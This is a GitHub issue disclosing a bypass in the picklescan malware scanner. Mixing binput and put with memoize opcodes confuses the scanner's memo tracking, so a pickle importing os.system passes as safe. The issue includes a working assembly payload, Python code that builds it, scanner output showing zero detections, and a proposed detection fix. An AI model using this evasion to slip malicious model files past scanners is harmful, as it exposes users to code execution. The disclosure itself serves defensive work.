Dangerous global detection bypass with memo dict confusion
dennis-doyensec opened this issue · 2 comments
Info
The picklescan tool attempts to keep track of the memo dict by parsing the
memoize opcodes whenever seen. The binput and put instructions also insert
objects into the memo but are left unhandled. While a legitimate python3
pickle should never mix *put and memoize instructions, doing so is accepted
by pickle.load.
Malware can potentially set up the memo using a mix of these opcodes so that
picklescan thinks memo[0] contains a safe module name like torch._utils when
it actually contains a dangerous one. Used in conjunction with binget and
stack_global instructions, any arbitrary Python import can be made to look
safe to picklescan.
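The divergence described above can be reproduced with a small model. The following is a minimal sketch, not picklescan's actual code: `resolved_globals` is a hypothetical helper that walks the opcodes with `pickletools.genops` and tracks only strings, and `track_put` switches between a scanner that ignores put-style opcodes and one that honours them. The payload mirrors the memo.asm listing in the Example section.

```python
import pickletools
import struct

STRING_OPCODES = {"STRING", "BINSTRING", "SHORT_BINSTRING",
                  "UNICODE", "BINUNICODE", "SHORT_BINUNICODE"}
PUT_OPCODES = {"PUT", "BINPUT", "LONG_BINPUT"}
GET_OPCODES = {"GET", "BINGET", "LONG_BINGET"}


def binstring(text):
    """Encode one BINSTRING opcode: b'T', 4-byte little-endian length, data."""
    raw = text.encode("ascii")
    return b"T" + struct.pack("<i", len(raw)) + raw


# Same opcode sequence as memo.asm: two binput, two memoize, two binget.
PAYLOAD = (
    binstring("os") + b"q\x00"
    + binstring("system") + b"q\x01"
    + binstring("torch._utils") + b"\x94"
    + binstring("_rebuild_tensor_v2") + b"\x94"
    + b"h\x00" + b"h\x01"   # binget 0, binget 1
    + b"\x93" + b"."        # stack_global, stop
)


def resolved_globals(data, track_put):
    """Hypothetical, simplified scanner model (strings and memo only)."""
    stack, memo, found = [], {}, []
    for opcode, arg, _pos in pickletools.genops(data):
        name = opcode.name
        if name in STRING_OPCODES:
            stack.append(arg)
        elif name == "MEMOIZE":
            memo[len(memo)] = stack[-1]      # next free index
        elif name in PUT_OPCODES and track_put:
            memo[arg] = stack[-1]            # explicit index
        elif name in GET_OPCODES:
            stack.append(memo[arg])
        elif name == "STACK_GLOBAL":
            attr = stack.pop()
            module = stack.pop()
            found.append(f"{module}.{attr}")
            stack.append(found[-1])          # placeholder for the global
    return found


naive_view = resolved_globals(PAYLOAD, track_put=False)
real_view = resolved_globals(PAYLOAD, track_put=True)
print("memoize-only scanner sees:", naive_view)
print("full memo tracking sees:  ", real_view)
```

The model that skips put-style opcodes fills memo[0] and memo[1] from the two memoize instructions, so it resolves the safe-looking name, while the model that follows all memo writes resolves the import the unpickler actually performs.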
Example
The following example uses radare2 (rasm2 and r2 commands) with the
r2pickledec plugin.
The following memo.asm file is commented to explain the bypass. Comments
start with ;.
;; Dangerous strings added to memo
binstring "os" ;; module name for os.system
binput 0 ;; memo[0] = stack[-1] = "os"
binstring "system" ;; function name for os.system
binput 1 ;; memo[1] = stack[-1] = "system"
;; Safe strings added to memo
binstring "torch._utils"
memoize
binstring "_rebuild_tensor_v2"
memoize
;; State of memo
;; real memo looks like
;;; memo = {0: "os", 1: "system", 2: "torch._utils", 3: "_rebuild_tensor_v2"}
;;; picklescan's memo looks like
;;; memo = {0: "torch._utils", 1: "_rebuild_tensor_v2"}
binget 0 ;; "os" but picklescan thinks it's "torch._utils"
binget 1 ;; "system" but picklescan thinks it's "_rebuild_tensor_v2"
stack_global ;; really: "os.system" but Picklescan thinks this is "torch._utils._rebuild_tensor_v2"
stop
The pickle can be assembled with rasm2.
$ rasm2 -a pickle -Bf memo.asm > memo.pickle
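For readers without radare2, the same byte sequence can be assembled from the opcode constants exported by Python's pickle module. This is a sketch under the assumption that rasm2 emits the standard one-byte opcodes with their usual operands; `binstring` and `build_memo_pickle` are hypothetical helper names. Loading the result only resolves the global and never calls it.

```python
import os
import pickle
import struct


def binstring(text: str) -> bytes:
    """BINSTRING: opcode, 4-byte little-endian length, then the raw bytes."""
    raw = text.encode("ascii")
    return pickle.BINSTRING + struct.pack("<i", len(raw)) + raw


def build_memo_pickle() -> bytes:
    """Assemble the opcode sequence from memo.asm, in the same order."""
    return b"".join([
        binstring("os"), pickle.BINPUT + b"\x00",          # memo[0] = "os"
        binstring("system"), pickle.BINPUT + b"\x01",      # memo[1] = "system"
        binstring("torch._utils"), pickle.MEMOIZE,         # memo[2]
        binstring("_rebuild_tensor_v2"), pickle.MEMOIZE,   # memo[3]
        pickle.BINGET + b"\x00",                           # push "os"
        pickle.BINGET + b"\x01",                           # push "system"
        pickle.STACK_GLOBAL,                               # import os.system
        pickle.STOP,
    ])


payload = build_memo_pickle()
loaded = pickle.loads(payload)  # returns the function object, does not call it
print(len(payload), loaded is os.system)
```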
Decompiling the pickle with r2 may help with understanding.
# r2 -a pickle -qqc 'pdP' memo.pickle
## VM stack start, len 5
## VM[4]
str_x0 = "os"
## VM[3]
str_x9 = "system"
## VM[2]
str_x16 = "torch._utils"
## VM[1]
str_x28 = "_rebuild_tensor_v2"
## VM[0] TOP
return _find_class(str_x0, str_x9)
The pickle will return os.system when loaded, proving access to a
dangerous function without detection by picklescan.
$ python3 -m pickle memo.pickle
<built-in function system>
$ picklescan -p memo.pickle
----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 0
Dangerous globals: 0
Fix
A legitimate pickle that uses memoize should not use binput or put. So
the simplest fix is to mark any pickle that contains a memoize instruction
together with a binput or put instruction as dangerous.
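The simple fix could look roughly like the check below. It is a sketch, not a patch for picklescan: `mixes_memo_styles` is a hypothetical name, and including LONG_BINPUT alongside put and binput is an assumption that goes slightly beyond the opcodes named in this issue. `pickletools.genops` stops at the first stop opcode and raises on malformed input, so a real scanner would need to handle both cases.

```python
import pickle
import pickletools

# Opcodes that write the memo at an explicit index (LONG_BINPUT is an
# assumption added here; the issue names only put and binput).
PUT_OPCODES = {"PUT", "BINPUT", "LONG_BINPUT"}


def mixes_memo_styles(data: bytes) -> bool:
    """Return True if the pickle uses MEMOIZE together with a put-style opcode."""
    names = {opcode.name for opcode, _arg, _pos in pickletools.genops(data)}
    return "MEMOIZE" in names and bool(names & PUT_OPCODES)


# Pickles written by the standard pickler use one style or the other.
sample = {"weights": [1, 2, 3], "name": "layer"}
print(mixes_memo_styles(pickle.dumps(sample, protocol=2)))
print(mixes_memo_styles(pickle.dumps(sample, protocol=4)))

# A hand-made pickle that mixes binput and memoize on the same string.
crafted = b"T\x02\x00\x00\x00os" + b"q\x00" + b"\x94" + b"."
print(mixes_memo_styles(crafted))
```

The standard pickler emits memoize for protocol 4 and later and put-style opcodes for earlier protocols, which is why the first two calls are expected to report no mixing.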
Attempting to parse the memo without a full AST is error prone. The
r2pickledec plugin is the only tool I am aware of that will produce a
full AST for all python pickle instructions. Running pdPj will produce the
following JSON for the above pickle.
$ r2 -a pickle -qqc 'pdPj~{}' picks/memo.pickle
{
"stack": [
{
"offset": 0,
"type": "PY_STR",
"value": "os"
},
{
"offset": 9,
"type": "PY_STR",
"value": "system"
},
{
"offset": 22,
"type": "PY_STR",
"value": "torch._utils"
},
{
"offset": 40,
"type": "PY_STR",
"value": "_rebuild_tensor_v2"
},
{
"offset": 68,
"type": "PY_GLOB",
"value": {
"module": {
"offset": 0,
"type": "PY_STR",
"prev_seen": ".stack[0]"
},
"name": {
"offset": 9,
"type": "PY_STR",
"prev_seen": ".stack[1]"
}
}
}
],
"popstack": [
]
}
Using r2pickledec in picklescan is possible through r2pipe but would
require adding dependencies that are not trivially installed with just pip.
I am the author of the pickle architecture in r2 and the r2pickledec
plugin, so I can offer some help if desired.
A warning on using proto for a fix
Since the offending opcodes are available in protocol 2 and earlier, it might
be tempting to only accept them when a pickle starts with proto 2. This won't
work. A pickle can redeclare its protocol version at will without any
unpickling error. Additionally, a pickle that has declared itself as proto 2
still has access to protocol 4 instructions.
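Both claims can be checked with a harmless hand-built pickle. The sketch below declares proto 2, uses the protocol 4 opcodes SHORT_BINUNICODE, MEMOIZE and STACK_GLOBAL, and redeclares the protocol halfway through; it resolves builtins.len rather than anything dangerous. The byte layout is written by hand for illustration.

```python
import pickle

payload = (
    pickle.PROTO + b"\x02"                       # declares protocol 2
    + pickle.SHORT_BINUNICODE + b"\x08builtins"  # protocol 4 opcode
    + pickle.MEMOIZE                             # protocol 4 opcode
    + pickle.PROTO + b"\x00"                     # redeclares the protocol
    + pickle.SHORT_BINUNICODE + b"\x03len"
    + pickle.STACK_GLOBAL                        # protocol 4 opcode
    + pickle.STOP
)

# Loads without an unpickling error even though the declared protocol
# never matches the opcodes that are actually used.
result = pickle.loads(payload)
print(result)
```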
Thanks! Investigating.
A legitimate pickle that uses memoize should not use binput or put
If the pickle spec prohibits this, then the "simple fix" is what I'd go for.
I'll take a look on my side too!